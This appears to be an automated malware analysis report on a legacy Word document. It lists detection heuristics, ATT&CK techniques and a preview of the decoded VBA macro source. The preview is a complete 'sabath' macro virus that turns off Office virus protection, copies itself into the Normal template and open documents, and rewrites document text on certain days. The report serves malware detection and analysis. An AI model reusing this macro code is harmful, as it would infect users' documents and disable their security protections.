MALICIOUS
196
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing VBA macros, including AutoOpen and Auto_Close, which are commonly used for malicious purposes. The 'sabath' macro attempts to export itself to 'c:\sabath.drv', suggesting an intent to execute further malicious code or establish persistence. The ClamAV detection as 'Win.Trojan.Pivis-2' further supports its malicious nature.
Heuristics 6
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub autoclose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3836 bytes |
SHA-256: 5de78fe5dfb212805f42a0981c9be752363638f0e3f7ba9ecdd3fa95648870a8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "sabath"
'ßìùèê, íå ãîíè! Òû ãîíèøü, ÿìùèê!
Sub ViewVBCode()
On Error Resume Next
Call sabath
End Sub
Sub sabath()
On Error Resume Next
Options.ConfirmConversions = False
Options.VirusProtection = False
'Áåäó íàCLICKàë...
Options.SaveNormalPrompt = False
ActiveDocument.VBProject.VBComponents("sabath").Export "c:\sabath.drv"
ActiveDocument.ReadOnlyRecommended = False
'Håò ïîâåñòè ïå÷àëüíåå íà ñâåòå,÷åì ïîâåñòü î çàêëèíèâøåì RESETe...
chislo = Int(Rnd * 100)
'Hàãëîñòü - âòîðîå ñ÷àñòüå.
'À çîìáè çäåñü òèõèå
'À íå ïîéòè ëè ìíå íà ðàáîòó,- ïîäóìàë ÿ. È íå ïîøåë.
'Àëêîãîëü â ìàëûõ äîçàõ áåçâðåäåí â ëþáîì êîëè÷åñòâå!
'Àìåðèêàíöû - ìû èç íåãðîâ çâåçä íå äåëàåì
If chislo = 99 Then MsgBox "Ïðèâåò VicodinES îò _\` /4 |3 /4 + |-|", vbSystemModal
If Day(Now()) = 1 Or 2 Or 3 Or 4 Or 5 Or 6 Or 13 Or 15 Or 17 Or 18 Or 19 Or 23 Or 25 Or 30 Or 31 Then Call Tooday
With Dialogs(wdDialogFileSummaryInfo)
'Hà õàëÿâó è "ÐÀÌÀ" - ñëèâî÷íîå ìàñëî.
.Author = " _\` /4 |3 /4 + |-| "
.Subject = "Viva VicodinES"
.Comments = "_\` /4 |3 /4 + |-| REproduction of Vic's XIXpoppy"
.Execute
'ßìùèê, íå ãîíè! Òû ãîíèøü, ÿìùèê!
End With
If NormalTemplate.VBProject.VBComponents.Item("sabath").Name <> "sabath" Then TemplateNameCheck = True
If ActiveDocument.VBProject.VBComponents.Item("sabath").Name <> "sabath" Then ActiveDocNameCheck = True
If TemplateNameCheck = True And ActiveDocNameCheck = False Then Set VIRIIconst = NormalTemplate.VBProject.VBComponents
If TemplateNameCheck = False And ActiveDocNameCheck = True Then Set VIRIIconst = ActiveDocument.VBProject.VBComponents
VIRIIconst.import "c:\sabath.drv"
If activeinst = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
If ActiveDocNameCheck = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
'MsgBox " _\` /4 |3 /4 + |-| tribute to VicodinES "
IDontKnowWhatItWas:
End Sub
Sub HelpAbout()
On Error Resume Next
MsgBox " _\` /4 |3 /4 + |-| ", vbInformation
End Sub
Sub AutoOpen()
On Error Resume Next
ShowVisualBasicEditor = False 'net VB editora
Call sabath
End Sub
Sub ToolsMacro()
On Error Resume Next
Call sabath
End Sub
Sub Tooday()
On Error Resume Next
Selection.HomeKey Unit:=wdStory
'Áåç òðóäà íå çàñóíåøü è òóäà.
'Áåðåãè åãî êàê çåíèöó - âî êàê.
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
With Selection.Find
.Text = " îí "
.Replacement.Text = "_\` /4 |3 /4 + |-|"
.Forward = True
.Wrap = wdFindContinue
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchAllWordForms = True
End With
Selection.Find.Execute Replace:=wdReplaceAll
If ActiveDocument.Saved = False Then ActiveDocument.Save
End Sub
Sub FileTemplates()
On Error Resume Next
With Application
Call sabath
End Sub
'password for view is xx3
Sub autoclose()
On Error Resume Next
StatusBar = "Get Ur NEW AVir TODAY!!! _\` A |3 A T |-|"
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.